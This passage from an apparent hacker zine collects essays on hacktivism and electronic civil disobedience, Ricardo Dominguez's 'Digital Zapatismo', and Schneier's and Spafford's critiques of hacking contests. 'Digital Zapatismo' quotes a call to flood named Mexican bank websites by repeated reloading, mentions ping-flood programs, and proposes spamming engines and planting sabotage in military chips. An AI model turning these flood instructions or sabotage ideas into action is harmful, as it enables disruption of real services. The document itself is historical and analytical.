The contemporary conception of hacktivism seems to concern itself more with overtly political hacking. It is such a recent development
that journalists have only barely begun to discover it, while scholars have had little time to consider it. There are numerous web sites
devoted to hacking, but very few are devoted to Hacktivism per se. One web site devoted to Hacktivism, however, was created in the fall
of 1998 by a group called The Cult of the Dead Cow. [27]

An important fact to realize and emphasize is that hacktivism, current forms of politicized hacking, is very much in its infancy. It is too
early to draw definitive conclusions or to make strong predictions as to the direction it will take. Perhaps we can point to certain
trajectories and make some logical projections. But we need to remember that at this point there is no consensus or agreement. Maybe
the entire notion of hacktivism confuses and challenges sets of values and hacker codes of ethics. Quite possibly there is some re-thinking
happening and we might begin to see a new set of ethical codes for hacking. [28]

Resistance to Future War

Some call the 1990-1991 Gulf War the first Information War because of the heavy military reliance on information and communication
technology. The Gulf War was a pinnacle of achievement for the weapons industry, a chance to battle test sophisticated hardware that
had been developed and manufactured under the Reagan and Bush presidencies. The weapons systems were dependent, as were all
communications, on a major telecommunications infrastructure involving satellite, radar, radio, and telephone. The "smart" bombs were
just the most mentioned of the sophisticated weaponry that was showcased during the made-for-CNN war.

Although significantly under-reported by mainstream U.S. media, there was sizeable domestic opposition to the Gulf War, both prior to
and especially during the first days of U.S. bombing of Iraq. In San Francisco, the first three days of the Gulf War are referred to as the
Three Days of Rage. During that period, demonstrators filled, occupied, and controlled the streets and in some cases bridges and
highways in the greater San Francisco Bay Area. Similar disruptions happened up and down the west coast and all across the country.
There was widespread grassroots resistance to the U.S. bombardment of Iraq in January 1991. [29]

One part of that history is the role of information and communication technology, not just for the military forces, but also for the
grassroots resistance. If the Gulf War is indicative of a paradigmatic shift toward the practice of Information Warfare, then it's also useful
to look at the way in which ICT enabled resistance to the war effort. Some people within the opposition to the 1990-1991 Gulf War
used email to communicate and they learned about resistance in other cities through Bulletin Board Systems and newsgroups. Others
without computer access used fax and telephone. But many people had no connection to computers and received nothing by fax, instead
they came out into the streets because of seeing posters or by hearing announcements on TV or on radio, or through word of mouth. It is
safe to say that the Internet played only a marginal role in spreading news and moving people into action. The opposition to the war also
watched CNN just like everyone else.

But that was the end of 1990 and the very beginning of 1991, 8 years ago at the time of this writing, and in a pre-Web phase and even
pre-Internet phase. Yes, by then the PC revolution had exploded and more and more people were buying modems, but the Gulf War is
clearly positioned in the pre-boom days of the Internet in the United States. An interesting question is what would happen today, or
moreover, what might happen tomorrow or in the near future, if presented with a similar set of circumstances. What if, for example, a
Gulf War-like scenario emerged at the end of the year 2000 and the beginning of 2001? Suppose the United States decided to engage in
what became an unpopular war, what might hacktivism look like in a condition of more generalized resistance? Or said another way,
what might generalized resistance look like with the condition of hacktivism?

The above is what is meant to be asked by suggesting that Resistance to Future War is the fifth portal into direct action Net politics.
Where might this all lead? Until now, incidents of hacktivity have been sporadic and basically unconnected. Hacktivist events have been
singular and not connected to a set of simultaneous occurrences. Perhaps the Electronic Disturbance Theater's work demonstrates the
possibility of waging a campaign on the Internet, and sustaining a presence over a period of time. But the group's one goal of a SWARM
has yet to be achieved. Maybe it is useful to think of the SWARM metaphor in the consideration of Resistance to Future War.

Perhaps a SWARM is a convergence of generalized resistance, referring to a situation in which there are not just isolated cases, or
several pockets of opposition, but when there is across-the-board resistance occurring at a number of different levels and happening in
cities and towns all across the country, all at the same time. Such was the case during moments of domestic Gulf War resistance. There
was a simultaneous outpouring of people into the streets who engaged in quite a range of activity, both legal and illegal. A multitude of
tactics were being used at the same time but without any central command or directing orders from above. Incidents of such upsurge are
rare, but they undoubtedly will occur again. What will hacktivism look like then? What of it when hacktivism moves from isolated
incidents to a convergence of allied forces? Is this when hacktivism ceases to be and becomes cyberspacial resistance? While it may be
too early to make accurate predictions, it seems true that the force or power of hacktivism has yet to be fully recognized or tested. Yet
before getting lost in futuristic science fiction, consider some critiques.

Emerging Critiques of Direct Action Net Politics

There is no consensus among social and political activists regarding electronic civil disobedience, political hacking, hacktivism, or more
generally extraparliamentarian direct action Net politics. It may in fact be too early to judge or to make definitive claims about these new
tactics, but some critiques have co-developed along with the development of these new methods. They point to some basic questions
over the effectiveness and appropriateness of these forms of electronic action.

In an emerging discourse on several email listservs, too complicated to treat fairly in such a short piece as this one, there have been
periodic criticisms raised both generally and specifically about aspects of the above mentioned tactics. [30] By no means can this piece
attempt to describe and comment on all criticisms being raised about hacktivism et al, but it can at least address several of the criticisms
raised that seem most important. As already stated there are critiques aimed at the effectiveness and the appropriateness of
cyber-protests. In terms of effectiveness, three closely related types of questions have appeared regarding political, tactical, and technical
effectiveness. Concerning appropriateness there are ethical questions, which may also be considered political questions, and of course
there are legal questions. Some of the legal concerns raise issues of enforceability and prosecutability.

Political and tactical effectiveness are closely intertwined. Are these methods of computerized activism effective? The answer is that it
depends on how effectiveness is defined. What is effective? If the desired goal of hacktivism is to draw attention to particular issues
by engaging in actions that are unusual and will attract some degree of media coverage, then effectiveness can be seen as being high. If,
however, effectiveness is measured in terms of assessing the action's ability to be a catalyst for fomenting a more profound mobilization of
people, then probably these new techniques are not effective. This distinction then, perhaps, is important. Hacktivism is not likely to be an
organizing tool and the end result of hacktivity is not likely to be an increase in the ranks of the disaffected. Rather, hacktivism appears to
be a means to augment or supplement existing organizing efforts, a way to make some noise and focus attention.

Technical critiques of hacktivism at the level of computer code are another way of addressing the efficacy of these new methods.
Undoubtedly there will be disagreement as to how effective a particular technique is or isn't. But it seems that if new methods are created
in an environment of experimentation, then valid critiques will be taken into consideration and used to redesign or alter plans and
strategies. However, there are some technical critiques that are actually much more ideologically based than it would first seem. For
example there is a certain tendency to reify bandwidth and from that viewpoint any action that clogs or diminishes bandwidth is
considered negative. So then, technical critiques can be value-laden with particular stances toward the Internet infrastructure.

Despite the current levels of political, tactical, and technical questions that are being raised about hacktivism et al, it seems to be an area
that is in a period of expansion, rather than contraction. And it generally seems that this critique and questioning is healthy and useful for
the refinement of the practice.

As just mentioned, some technical critiques are bound together with ideological pre-dispositions and are therefore also political questions,
and perhaps even ethical questions of appropriateness. To judge blocking a web site, or clogging the pipelines leading up to a web site, is
to take an ethical position. If the judgement goes against such activity, such an ethical position is likely to be derived from an ethical code
that values free and open access to information. But there are alternative sets of values that justify, for example, the blocking of access
to web sites. These differences in beliefs over the nature of the Internet infrastructure are among people who are basically on the same
side when it comes to most political questions. Some of these differences will probably be worked out as the subject and practice
mature, while there may remain clear divisions.

Last but not least, the more prosecutorial minded are apt to pass judgement on the appropriateness or inappropriateness of certain forms
of hacktivism based on where the actions stand with respect to the law. While it is true that some forms of hacktivity are fairly easy to see
as being outside the bounds of law - such as entering into systems to destroy data - there are other forms that are more ambiguous and
hover much closer to the boundary between the legal and the illegal. Coupled with this ambiguity are other factors that tend to cloud the
enforceability or prosecutability of particular hacktivist offenses. Jurisdictional factors are key here. The nature of cyberspace is
extraterritorial. People can easily act across geographic political borders, as those borders do not show themselves in the terrain. Law
enforcement is still bound to particular geographic zones. So there is a conflict between the new capabilities of political actors and the old
system to which the law is still attached. This is already beginning to change, and legal frameworks, at the international level, will be
mapped on to cyberspace.

This section does not do justice to the full range of critiques that can be identified and described, and further exploration of the subject of
direct action Net politics should make sure such a deeper analysis is taken. The intention here has been more so to develop a greater
understanding of these new forms of electronic action and to only mention a few overarching critiques so as to not give the impression
that this is moving forward without resistance. Quite the contrary is true. It seems that hacktivity has met and will meet resistance from
many quarters. It doesn't seem as if opposition to hacktivist ideas and practices falls along particular ideological lines either.

Conclusion

Several things seem to be clear at this point. The first is that hacktivism, as defined across the full spectrum from relatively harmless
computerized activism to potentially dangerous resistance to future war, is a phenomenon that is on the rise. Second, as just alluded to,
hacktivism represents a spectrum of possibilities that exists in some combination of word and deed. On the one end of the spectrum is
pure word. On the other end of the spectrum is pure deed. Computerized activism hovers closer to pure word, while the successive
portals move closer toward pure deed. Third, along with this tendency towards transgression, towards giving value to actions that move
beyond words and that see the Internet infrastructure also as a site for action, there comes a critique and resistance. Despite
this critique hacktivism is likely to continue to spread, but perhaps modified to accommodate some of the criticism. Fourth, with its
continued spread, modified by critique or not, hacktivism is also likely to continue to gain attention. While media coverage may eventually
drop off if or when hacktivism becomes more commonplace, at this point the way in which hacktivism is being represented is still new
enough to warrant media attention for the foreseeable near future.

What remains unclear about hacktivism emerges when we start to ask questions like: what does this mean and where is this going? While
we can claim with a fair degree of certainty that hacktivism is on the rise, there is little way to tell where it will lead and the significance
or lack thereof that it will or might obtain. Moreover, there are aspects of hacktivism that still need to be explored. For example, the
entire issue of extraterritoriality, of the Internet not being bound to any particular geographic region and the difficulties that poses for law
enforcement, is one area that deserves further attention.

One reason why it is difficult to get a firm grip on hacktivism's direction, in addition to simply saying that it is too early to tell, is that
hacktivism will evolve in response to changing global economic and political conditions. As it is hard to predict trends and directions in
the global economy, it too, then, becomes hard to predict events that will be linked to those meta shifts.

Nevertheless, some people are trying to understand and make sense out of where hacktivism could go, although they might not be doing
so using the particular word 'hacktivism' to describe this activity. Governments and corporations are keenly concerned, for example,
about network security. To get some indications about the forecast for hacktivism in the 21st century it may be very useful to examine
what these sorts of institutions are saying and how they are preparing to defend themselves.

It could very well be that governments might impose severe regimes that successfully curtail hacktivism. If so, 1998 might be seen at
some point as the glory days, when hacktivist experiments were able to go largely unchallenged, because the mechanisms of the state had
not yet been put in place to deal with the new phenomenon. Or it could be that hacktivism is able to successfully remain several steps out in
front of law enforcement efforts, or that so many people become involved that enforceability remains problematic. Again, it is difficult to
know any of this.

Finally, while we can speak with some clarity about facets of hacktivism and also point to aspects of it that remain ambiguous and
unforeseen, there is an overarching concern that comes from this discussion that deserves more attention. Specifically arising out of the
consideration of the fifth portal, Resistance to Future War, what are the long term consequences posed for governments and states if
individuals, non-state actors, can engage in forms of cyberspacial resistance across traditional geo-political borders? This is an important
question raised by this discussion and one that demands more attention to answer properly. But it seems clear already that we are at the
onset of a new way of thinking about, participating in, and resisting war, and that today's nascent hacktivity is part of the trajectory
towards that new way.


Footnotes

1. Amy Harmon, "'Hacktivists' of All Persuasions Take Their Struggle to the Web," New York Times, 31
October 1998, sec. A1; Same in Carmin Karasic scrapbook
(http://custwww.xensei.com/users/carmin/scrapbook/nyt103198/31hack.html)
2. John D. H Downing, "Computers for Political Change: PeaceNet and Public Data Access," Journal of
Communication 39, no. 3 (Summer 1989): 154-62.
3. Harry Cleaver, "The Zapatistas and the International Circulation of Struggle: Lessons Suggested and
Problems Raised," Harry Cleaver homepage 1998 (http://www.eco.utexas.edu/faculty/Cleaver/lessons.html)
4. Kenneth L. Hacker, "Missing links in the evolution of electronic democratization," Media, Culture &
Society 18, (1996): 213-32; Lewis A. Friedland, "Electronic democracy and the new citizenship," Media,
Culture & Society 18, (1996): 185-212; John Street, "Remote Control? Politics, Technology and
'Electronic Democracy'," European Journal of Communication 12, no. 1 (1997): 27-42.
5. John D. H Downing, "Computers for Political Change: PeaceNet and Public Data Access," Journal of
Communication 39, no. 3 (Summer 1989): 154-62.
6. Linda M. Harasim, ed., Global Networks: Computers and International Communication (Cambridge,
Mass.: MIT Press 1993)
7. There are many protest web sites. Trying a search on keywords "protest" and "web site" and there
will be thousands of hits.
8. John Arquilla and David Ronfeldt, "Cyberwar is Coming!," Comparative Strategy 12 (April-June 1993):
141-65.; (http://gopher.well.sf.ca.us:70/0/Military/cyberwar)
9. Cleaver, Harry "The Zapatistas and The Electronic Fabric of Struggle," Harry Cleaver homepage 1995
(http://www.eco.utexas.edu/faculty/Cleaver/zaps.html)
10. Gerfried Stocker and Christine Schopf, eds. InfoWar (Wien, Austria: Springer 1998); Ars
Electronica Festival 1998 (http://www.aec.at/infowar)
11. Stefan Wray, "Towards Bottom-Up Information Warfare: Theory and Practice: Version 1.0," Electronic
Civil Disobedience Archive 1998 (http://www.nyu.edu/projects/wray/BottomUp.html)
12. Stefan Wray, "The Drug War and Information Warfare in Mexico," Masters Thesis, University of Texas at
Austin, Electronic Civil Disobedience Archive 1997 (http://www.nyu.edu/projects/wray/masters.html)
13. La Jornada (http://serpiente.dgsca.unam.mx/jornada/index.html)
14. Harry Cleaver, "Zapatistas in Cyberspace: An Accion Zapatista Report," Harry Cleaver homepage 1998
(http://www.eco.utexas.edu/faculty/Cleaver/zapsincyber.html)
15. No specific reference to this fact. But it is a matter of record.
16. Stefan Wray, "On Electronic Civil Disobedience," Peace Review 11, no. 1, (1999), forthcoming;
Electronic Civil Disobedience archive 1998 (http://www.nyu.edu/projects/wray/oecd.html)
17. Critical Art Ensemble, The Electronic Disturbance (Brooklyn, NY: Autonomedia 1994); Critical Art
Ensemble, Electronic Civil Disobedience and Other Unpopular Ideas (Brooklyn, NY: Autonomedia 1996);
Critical Art Ensemble homepage (http://mailer.fsu.edu/~sbarnes/)
18. Stefan Wray, "Paris Salon or Boston Tea Party? Recasting Electronic Democracy, A View from
Amsterdam," Electronic Civil Disobedience archive 1998
(http://www.nyu.edu/projects/wray/teaparty.html)
19. Electronic Disturbance Theater homepage (http://www.thng.net/~rdom/ecd/ecd.html)
20. Brett Stalbaum, "The Zapatista Tactical FloodNet," Electronic Civil Disobedience Web Page 1998
(http://www.nyu.edu/projects/wray/ZapTactFlood.html)
21. Ricardo Dominguez, "SWARM: An ECD Project for Ars Electronica Festival '98," Ricardo Dominguez
homepage 1998 (http://www.thing.net/~rdom/)
22. Electronic Disturbance Theater, "Chronology of SWARM,"
(http://www.nyu.edu/projects/wray/CHRON.html)
23. "Email Message From DISA to NYU Computer Security," Electronic Civil Disobedience homepage
(http://www.nyu.edu/projects/wray/memo.html)
24. Electronic Disturbance Theater's call for Electronic Civil Disobedience on November 22, 1998
(http://www.thing.net/~rdom/ecd/November22.html); (http://www.thing.net/~rdom/ecd/block.html)
25. "Mexico rebel supporters hack government home page," Reuters, 4 February 1998; Same in Electronic
Civil Disobedience homepage (http://www.nyu.edu/projects/wray/real.html)
26. Amy Harmon, "'Hacktivists' of All Persuasions Take Their Struggle to the Web," New York Times, 31
October 1998, sec. A1; Same in Carmin Karasic scrapbook
(http://custwww.xensei.com/users/carmin/scrapbook/nyt103198/31hack.html); Bob Paquin, "E-Guerrillas in
the mist," The Ottawa Citizen, 26 October 1998
(http://www.ottawacitizen.com/hightech/981026/1964496.html)
27. Hacktivism web page (http://www.hacktivism.org); Cult of the Dead Cow homepage
(http://www.cultdeadcow.com/)
28. While it is possible to point to certain early hacker ethical codes that, for example, privilege
free and open access to all, there is not a monolithic hacker's perspective. Nevertheless, some whom
call themselves hackers have criticized the FloodNet project because one of the things they allege it
does is block bandwidth. This view can be said to be a digitally correct position.
29. The author knows about grassroots resistance to the 1990/1991 Gulf War because he was involved in
anti-war organizing and action in the San Francisco Bay Area during this period.
30. Some of these listservs include: nyfma@tao.ca, damn-org@tao.ca, media-l@tao.ca,
accion-zapatista@mcfeeley.cc.utexas.edu


SP.02 "Digital Zapatismo"
~~~~~~~~~~~~~~~~~~~

Digital Zapatismo

http://www.freespeech.org/resistance/texts/DigZap.html
by Ricardo Dominguez
http://www.thing.net/~rdom/


Zapatismo has infected the political body of Mexico's "perfect dictatorship" since January 1, 1994. This polyspacial movement for a radical democracy based on the Mayan legacies of
dialogue ripped into the electronic fabric not as InfoWar--but as virtual actions for real peace in the real communities of Chiapas. As of September 1997, reports of the Mexican military
training and arming paramilitary groups with the intent of moving the "low-intensity" war to a higher level began to circulate among the Zapatista Network. It took the massacres at Acteal
to focus the world on something that was already known--the constant tragedy of late-capital.

As manifestations took place around the world in remembrance of the Acteal dead on January 1 and 2, the Mexican military, with the full support of the PRI government, began the next
stage of the war against peace. As the West stumbled about in celebration of a new year--the first report reached out across the net and slapped us awake once more with the brutal
reality of the neo-liberal agenda.

1.0 Beta Actions

This time the Zapatista Networks responded with a new level of electronic civil disobedience beyond the passing of information and emailing presidents. On Sunday the 18th of January 1998,
a call for NetStriking for Zapata (from the Anonymous Digital Coalition) came in via email with the following instructions:

In solidarity with the Zapatista movement we welcome all netsurfers with ideals of justice, freedom, solidarity and liberty within their hearts, to a virtual sit-in. On January 29, 1998 from
4:00 p.m. GMT (Greenwich Mean Time) to 5:00 p.m. (at the following five web sites, symbols of Mexican neoliberalism):

Bolsa Mexicana de Valores: http://www.bmv.com.mx
Grupo Financiero Bital: http://www.bital.com.mx
Grupo Financiero Bancomer: http://www.bancomer.com.mx
Banco de Mexico: http://www.banxico.org.mx
Banamex: http://www.banamex.com

Technical instructions: Connect with your browser to the above-mentioned web sites and push the button "reload" several times for an hour (with an interval of a few seconds in between).

This virtual sit-in not only brought the possibilities of direct electronic actions to the forefront of the Zapatista networks, it also initiated a more focused analysis of what methods of
electronic civil disobedience might work. Several questions were brought up on the issues of net traffic, ISPs, and small international pipes. Speculations on the technological
implications of these actions began to focus on the question of who is most likely to be damaged by this move: the targeted Mexican banks, or the Internet Service Providers (ISPs) who
route data to these banks?

As these discussions were taking place, a group of Mexican digital activists on February 4, 1998 hacked into a Mexican government home page on the Internet and placed pro-Zapatista
slogans on the front pages of the site. Soon afterwards an MS-DOS Ping Action program from the ECD group arrived to hit Mexican banks and Chase Manhattan Bank on February 9.

The next level of possible ECD began to emerge at the end of February: an automatic mail engine from the New Humans, and a Java-based site that automatically began to ping the British
Mexican Embassy URL every 7 seconds once you logged in.

2.0 InfoWar

To move beyond these Beta actions we need to map the general condition of InfoWar at this shifting point in time.

Command and control systems (CCS) within the Military and Intelligence Communities have been re-shifting their definition of war for some time. That surveillance systems like Project
Echelon would become a priority is no surprise. The NSA (National Security Agency) and the NRO (National Reconnaissance Office) have been working on implementing new functions
for themselves since the end of the Cold War.

They had to re-invent themselves into hyper-surveillance networks that can accomplish defensive intelligence gathering and rapid containment missions for the lowest cost possible.
Now it is more important to attack an opponent's information infrastructure than it is to destroy its armies. Actions like the Gulf War are now only useful for limited screenal political gambits.

The enemy is now hosted by the global public commercial networks. InfoWar tactics must now maintain a constant analysis of all information flows and a continuous tracking of the
backbone routes, in search of the most effective way to bring down specific zones of resistance within an enemy's political or economic structures:


1. Commercial communication systems.
2. Broadcasting networks.
3. Financial data systems.
4. Transportation systems
5. Internet Server networks.

Of course one of the problems faced by these IW scenarios is that military and intelligence systems here are also routed within public commercial lines.

The scenarios of possible implosions faced by the decentralization of command and control are increasing at a co-equal rate with the speed of access to hardware, software, and training.
Late Capital demands that this equation grow even faster and to the farthest reaches of the globe.
The necessity of the rule of association and strategic coalitions between military and intelligence networks and mega-corporation webs, universities, independent ISPs, electronic
political cells, and individual research and analysis creates a general state of pan-anarchy.

Thus the IWW (Information World War) has already started, and it is haunted by its own shadow. It must face the task of dealing with an open network that has at least 5 vulnerabilities:


1. Bottom-up architecture.

2. Multiple distribution points.

3. Memetic networks (MMN): independent networks which coordinate without the unification of a central command.

4. Non linearity and complexity effects: where simple interactions lead to unpredictable outcomes.

5. Constant states of emergency: all systems are always already not enough and must be constantly upgraded.

In order to deal with this growing vulnerability of the electronic infrastructure with the onset of InfoWar, the State has redefined command, control, intelligence and resistance. InfoWar
tactics are now moving beyond the theoretical questions about the rise of "network power" and the end of hierarchies. Instead, Military and Intelligence groups are now experimenting
with pragmatic hybrid structures that can retain control over networks while allowing network autonomy to expand within specific types of command structures, in order to contain the
rising soft power of small groups that can organize themselves "into sprawling networks" threatening hard power structures.

3.0 Hacking the Future

Digital Zapatismo has always been an open system of sprawling networks—this has been the force multiplier of the movement. It used digital culture's most basic system of exchange,
e-mail between people, to disturb the Informatic State. Now we know that they are using, as we always suspected, hyper-surveillance filters to regain control of the network.

We must begin to invent other methods of Electronic Civil Disobedience:


1. Alternative networks with more access and bandwidth. More projects like Name.space attacking the control of the root.name structures by Internic.

2. Deep programming: Creating Spiders, Bots, and other (minor network agents) to move against specific URLs without interrupting the Server. The first Zapatista Spider should
be available by the end of May.

3. Offshore Domains: To maintain spamming engines for massive e-mail actions.

4. Virtual proximity capabilities: Create simple access systems for Real Time intercontinental electronic communication. These types of systems would disable the possibility of
surveillance. A prototype has been developed by Thing.net—The Thing Connector 3.0.

5. Satellites: To gather a fund among alternative networks to buy our own Satellite, giving us autonomy from controlled networks and backbones. The Nettime community has
been discussing the possibility.

6. Jamming Chips: Jamming by highly trained cells could systematically disrupt wide areas of sensitive networks. These micro-squads could slip basic disturbances into
the chips bought by the U.S. military-entertainment complex from foreign countries. Many of these elements are part of a wide range of defensive and offensive weapon
systems--that could induce a general dysfunction in performance at a pre-set time.

The Zapatista Networks, in the spirit of Chiapas, are developing methods of electronic disturbance as sites of invention and political action for peace. At this point in time it is difficult to
know how much of a disturbance these acts of electronic civil disobedience specifically make. What we do know is that neoliberal power is extremely concerned by these acts.

Since Jan 1, 1994 the analysis of the Zapatista Electronic Movement has been at the top of the list of the Military and Intelligence research agenda. For now all we can do is continue to
forge ahead and always remember that all of this electronic activism is about a real community in search of a real peace. A community that has been calling for a world that makes all worlds
possible.

@copyleft


Electronic Civil Disobedience Homepage


@HWA


SP.C1 The Phallusy of cracking contests, (how big is yours?)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


The Fallacy of Cracking Contests


You see them all the time: "Company X offers $1,000,000 to anyone who can
break through their firewall/crack their algorithm/make a fraudulent
transaction using their protocol/do whatever." These are cracking
contests, and they're supposed to show how strong and secure the target of
the contest is. The logic goes something like this: We offered a prize
to break the target, and no one did. This means that the target is secure.


It doesn't.


Contests are a terrible way to demonstrate security. A
product/system/protocol/algorithm that has survived a contest unbroken is
not obviously more trustworthy than one that has not been the subject of a
contest. The best products/systems/protocols/algorithms available today
have not been the subjects of any contests, and probably never will be.
Contests generally don't produce useful data. There are three basic
reasons why this is so.


1. The contests are generally unfair.


Cryptanalysis assumes that the attacker knows everything except the secret.
He has access to the algorithms and protocols, the source code,
everything. He knows the ciphertext and the plaintext. He may even know
something about the key.


And a cryptanalytic result can be anything. It can be a complete break: a
result that breaks the security in a reasonable amount of time. It can be
a theoretical break: a result that doesn't work "operationally," but still
shows that the security isn't as good as advertised. It can be anything in
between.


Most cryptanalysis contests have arbitrary rules. They define what the
attacker has to work with, and how a successful break looks. Jaws
Technologies provided a ciphertext file and, without explaining how their
algorithm worked, offered a prize to anyone who could recover the
plaintext. This isn't how real cryptanalysis works; if no one wins the
contest, it means nothing.


Most contests don't disclose the algorithm. And since most cryptanalysts
don't have the skills for reverse-engineering (I find it tedious and
boring), they never bother analyzing the systems. This is why COMP128,
CMEA, ORYX, the Firewire cipher, the DVD cipher, and the Netscape PRNG were
all broken within months of their disclosure (despite the fact that some of
them have been widely deployed for many years); once the algorithm is
revealed, it's easy to see the flaw, but it might take years before someone
bothers to reverse-engineer the algorithm and publish it. Contests don't
help.


(Of course, the above paragraph does not hold true for the military. There
are countless examples of successful reverse-engineering--VENONA, PURPLE--in
the "real" world. But the academic world doesn't work that way,
fortunately or unfortunately.)


Unfair contests aren't new. Back in the mid-1980s, the authors of an
encryption algorithm called FEAL issued a contest. They provided a
ciphertext file, and offered a prize to the first person to recover the
plaintext. The algorithm has been repeatedly broken by cryptographers,
through differential and then linear cryptanalysis and by other statistical
attacks. Everyone agrees that the algorithm was badly flawed. Still, no
one won the contest.


2. The analysis is not controlled.


Contests are random tests. Do ten people, each working 100 hours to win
the contest, count as 1000 hours of analysis? Or did they all try the same
things? Are they even competent analysts, or are they just random people
who heard about the contest and wanted to try their luck? Just because no
one wins a contest doesn't mean the target is secure...it just means that
no one won.


3. Contest prizes are rarely good incentives.


Cryptanalysis of an algorithm, protocol, or system can be a lot of work.
People who are good at it are going to do the work for a variety of
reasons--money, prestige, boredom--but trying to win a contest is rarely
one of them. Contests are viewed in the community with skepticism: most
companies that sponsor contests are not known, and people don't believe
that they will judge the results fairly. And trying to win a contest is no
sure thing: someone could beat you, leaving you nothing to show for your
efforts. Cryptanalysts are much better off analyzing systems where they
are being paid for their analysis work, or systems for which they can
publish a paper explaining their results.


Just look at the economics. Taken at a conservative $125 an hour for a
competent cryptanalyst, a $10K prize pays for two weeks of work, not enough
time to even dig through the code. A $100K prize might be worth a look,
but reverse-engineering the product is boring and that's still not enough
time to do a thorough job. A prize of $1M starts to become interesting,
but most companies can't afford to offer that. And the cryptanalyst has no
guarantee of getting paid: he may not find anything, he may get beaten to
the attack and lose out to someone else, or the company might not even pay.
Why should a cryptanalyst donate his time (and good name) to the company's
publicity campaign?


Cryptanalysis contests are generally nothing more than a publicity tool.
Sponsoring a contest, even a fair one, is no guarantee that people will
analyze the target. Surviving a contest is no guarantee that there are no
flaws in the target.


The true measure of trustworthiness is how much analysis has been done, not
whether there was a contest. And analysis is a slow and painful process.
People trust cryptographic algorithms (DES, RSA), protocols (Kerberos), and
systems (PGP, IPSec) not because of contests, but because all have been
subjected to years (decades, even) of peer review and analysis. And they
have been analyzed not because of some elusive prize, but because they were
either interesting or widely deployed. The analysis of the fifteen AES
candidates is going to take several years. There isn't a prize in the
world that's going to make the best cryptanalysts drop what they're doing
and examine the offerings of Meganet Corporation or RPK Security Inc., two
companies that recently offered cracking prizes. It's much more
interesting to find flaws in Java, or Windows NT, or cellular telephone
security.


The above three reasons are generalizations. There are exceptions, but
they are few and far between. The RSA challenges, both their factoring
challenges and their symmetric brute-force challenges, are fair and good
contests. These contests are successful not because the prize money is an
incentive to factor numbers or build brute-force cracking machines, but
because researchers are already interested in factoring and brute-force
cracking. The contests simply provide a spotlight for what was already an
interesting endeavor. The AES contest, although more a competition than a
cryptanalysis contest, is also fair.


Our Twofish cryptanalysis contest offers a $10K prize for the best negative
comments on Twofish that aren't written by the authors. There are no
arbitrary definitions of what a winning analysis is. There is no
ciphertext to break or keys to recover. We are simply rewarding the most
successful cryptanalysis research result, whatever it may be and however
successful it is (or is not). Again, the contest is fair because 1) the
algorithm is completely specified, 2) there are no arbitrary definitions of
what winning means, and 3) the algorithm is public domain.


Contests, if implemented correctly, can provide useful information and
reward particular areas of research. But they are not useful metrics to
judge security. I can offer $10K to the first person who successfully
breaks into my home and steals a book off my shelf. If no one does so
before the contest ends, that doesn't mean my home is secure. Maybe no one
with any burgling ability heard about my contest. Maybe they were too busy
doing other things. Maybe they weren't able to break into my home, but
they figured out how to forge the real-estate title to put the property in
their name. Maybe they did break into my home, but took a look around and
decided to come back when there was something more valuable than a $10,000
prize at stake. The contest proved nothing.


SP.C2 Hacker challenges: Boon or Bane by Gene Spafford
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hacker Challenges -- Boon or Bane?

(From Cipher, an infowar publication located at
http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/old-issues/issue9602 - Ed)

Commentary by Gene Spafford, with responses from Sameer Parekh,
Jon Wiederspan, and Jeff Weinstein
______________________________________________________________________
In the past year, several businesses have made resources publicly available on
the Internet and challenged all comers to find bugs in them or break into them.
Incentives offered to those who reported valid break-ins or bugs have ranged
from T-shirts to cold cash. Recently, Gene Spafford of Purdue University
decried this growing practice in a message circulated widely on the Internet.
Cipher has obtained responses from some of the organizations who have
sponsored challenges of one sort or another, and is circulating them along
with that note. We thank Prof. Spafford and the organizations who responded
to our request for comments.

A Few Comments on "Hacker Challenges"
+++++++++++++++++++++++++++++++++++++
by Eugene H. Spafford, COAST Laboratory Director, Purdue University
http://www.cs.purdue.edu/people/spaf

I note with dismay the increasing number of "hacker challenges" used in
marketing security products. I think these are actually harmful to the
profession and practice of security, rather than helpful. I believe the
harm comes in two ways: (1) the challenges don't serve as any real test
of the products, and it denigrates security professionals by suggesting
that they should accept them as proof of security; and (2) it helps
reinforce the image that there should be some form of reward for
hacking through security measures. Neither of these are views we should
responsibly seek to promote.

Consider the nature of showing the security of a product. Does a
"challenge" meet the goal of testing, which is to increase one's
confidence in the correct functioning of the artifact? It really
doesn't, for a number of reasons:
o Few such "challenges" are conducted using established testing
techniques. They are ad hoc, random tests. Thus, there is no way of
determining final coverage. For instance, if 90% of all challenge
attacks are of the same variety, what has the "test" really shown?
(Consider testing a calculator. If you perform 10,000 tests, but
9000 of them are addition with zero, have you done a thorough job of
testing?)
o That no problems are found does not mean that no problems exist. It
may mean that the testers didn't expose them. Doing random,
black-box testing remotely is not likely to really test much of the
product. (Challenge testing is basically a form of black-box
testing.)
o That no problems are reported does not mean that no problems exist.
The "testers" might not have recognized them. (Look at how often
software is released with bugs, even after careful scrutiny -- users
don't always recognize anomalies.)
o That no problems are reported does not mean that no problems exist.
How do you know that the "testers" will report what they find? How
do you know the vendor is getting accurate data? If Jane Random
Hacker found a way to penetrate the product in a manner that vendor
monitoring didn't expose, it is possible she'd find more profitable
uses (later) for that information than informing the vendor about
it. Further, because of possible problems with the law, hackers
might not want to report success and draw attention to themselves.
o Simply because the vendor does not report a successful penetration
does not mean that one did not occur -- the vendor may choose not to
report it because it would reflect poorly on its product, or not
meet the narrow criteria for a "successful" penetration, or the
vendor may not be able to detect it happened. (How can anyone
outside prove otherwise?)
o Seldom do the really good experts, on either side of the fence,
participate in such exercises. Thus, anything done is usually done
by amateurs. (The "honor" of having won the challenge is not
sufficient to lure the good ones into the fray. Good consultants
command fees of several thousand $$ per day in some cases -- why
should they donate their time and names for what amounts to free
consulting and advertising?)

Also note that any such challenge also serves to aid potential hackers
in their later pursuits:
o It gives potential miscreants some period to practice breaking the
system without penalty. Any other time spent hacking at one of these
might result in legal action or worse. Isn't it nice the vendor is
giving free practice time to the bad guys? I hope all the potential
customers are equally pleased at this.
o It gives miscreants an excuse if they are caught trying to break into the
system later (e.g., "We thought the contest was still on.") This
might well weaken any legal action taken later.
o The vendor contest may actually even include some publication of
hacks that don't work -- thus helping reduce the effort to
compromise the system later.

Furthermore, the whole process sends the wrong message -- that we
should build things and then try to break them, or that there is some
prestige or glory in breaking systems. That isn't what we need.
Instead, we want to promote responsible behavior, using established
methods. We need to establish that security is something best done by
well-trained professionals, and that hacking into systems is not "job
